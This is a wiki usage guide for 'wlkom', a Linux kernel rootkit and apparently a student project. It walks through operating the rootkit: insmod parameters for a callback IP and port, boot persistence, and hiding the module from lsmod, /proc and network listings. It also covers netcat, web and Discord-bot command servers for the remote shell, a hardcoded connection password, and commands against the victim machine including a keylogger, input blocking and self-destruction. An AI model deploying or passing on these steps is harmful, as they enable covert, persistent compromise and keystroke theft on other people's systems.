Skip to content

Usage Guide

Jump to bottom
a5traa edited this page Jun 14, 2025 · 6 revisions

Usage Guide

Compiling the Module

To compile the kernel module, run:

make

Inserting the Module into the Kernel

You can pass the ip, port, persistence, hide, and debug arguments when inserting the module. By default, the ip is set to 127.0.0.1, the port to 4242, persistence to NULL, hide to OFF, and debug to ON.

sudo insmod wlkom.ko ip=$IP port=$PORT persistence=$PERSISTENCE hide=$HIDE debug=$DEBUG

ip argument

  • Description: Specifies the IP address to which the module will connect for remote communication.
  • Default: 127.0.0.1 (localhost).

port argument

  • Description: Specifies the port number on which the module will establish the connection for remote communication.
  • Default: 4242.

persistence argument

  • Description: Defines whether the module should automatically load on boot.
  • Values:
    • ON: Enables persistence, meaning the module will reload on the next reboot with the same arguments.
    • OFF: Disables persistence, meaning the module will not automatically load after a reboot.
    • NULL: Default option, has no effect on persistence.
  • Default: NULL.

hide argument

  • Description: Enables stealth mode, hiding the module from standard system inspection tools and interfaces.
  • Values:

    • ON: Hides the module from:

      • lsmod output,
      • /proc/modules and /proc/kallsyms,
      • process listings,
      • network information files like /proc/net/tcp and /proc/net/udp.

      While hidden, the module cannot be removed using rmmod.
      To unhide the module and make it removable again, run the following command:

      kill -42 1

    • OFF: Disables hiding. The module remains fully visible in the system.

  • Default: OFF

debug argument

  • Description: Controls whether printk messages from the rootkit are shown in the logs.
  • Values:
    • ON: (Default) All printk messages will be visible in the dmesg logs.
    • OFF: Disables printk messages, and no output will appear in the dmesg logs.
  • Default: ON.

Launching a Remote Shell Control Server

You need to launch a server to communicate with the module and receive results. There are several ways to do this:

Netcat Server

Start a local Netcat server by running:

nc -l 127.0.0.1 4242

Web Server

Alternatively, you can start a web server by running:

python attacking_program/app.py

Discord Bot Server

To use the Discord bot for remote control, follow these steps:

  1. Enter your bot token in the file /rootkit/discord/config/config.json.
  2. Execute the initialization script:
./rootkit/discord/init.sh
  1. Start the Discord bot by running:
python3 /rootkit/discord/main.py

Viewing Logs

To view logs, you can use the dmesg command from another terminal:

sudo dmesg -T -L -W
  • -T: Displays timestamps in a human-readable format.
  • -L: Adds color to the text for better readability.
  • -W: Only shows new logs, not those generated during startup.

If the debug argument is set to ON, all printk messages will be visible in the logs.

Special Commands

Several special commands have been integrated into the rootkit. These commands all start with the prefix /. To see a detailed list of available commands, execute /help. For help on a specific command, execute /help <command>. The following special commands are available:

  • /sysinfo: Retrieves system information from the victim machine.
  • /enable : Enables the specified option on the victim machine.
  • /disable : Disables the specified option on the victim machine.
  • /selfdestruction: Completely removes all traces of the rootkit module from the system.

The <option> argument for both /enable and /disable currently supports the following choices:

  • keyboard: Blocks or unblocks keyboard input.
  • mouse: Blocks or unblocks mouse usage.
  • keylogger: Enables or disables a keylogger.

Password Protection on Connection

Regardless of the connection method (Netcat, web server, Discord bot, etc.), a password will be requested upon each new connection. The prompt appears as follows:

$ nc -l 127.0.0.1 4242
New connection. Please enter the password:

  • The required password is:

    epita

  • For security, after every 3 failed password attempts, the wait time before allowing the next set of retries increases progressively, starting at 60 seconds and escalating until it ultimately triggers the self-destruction of the module to prevent brute force attacks.

Removing the Module

To remove the kernel module, run:

sudo rmmod wlkom

Important:

  • If the persistence option was set to ON and you want to disable persistence, you can reload the module with persistence disabled by running:

    sudo insmod wlkom persistence=OFF

    This will prevent the module from loading automatically on the next reboot.

  • If the hide option was set to ON, the module is hidden and cannot be removed directly.
    You must unhide it first by executing:

    kill -42 1

Once the module is unhidden (if needed), you can safely remove it with rmmod.

Clone this wiki locally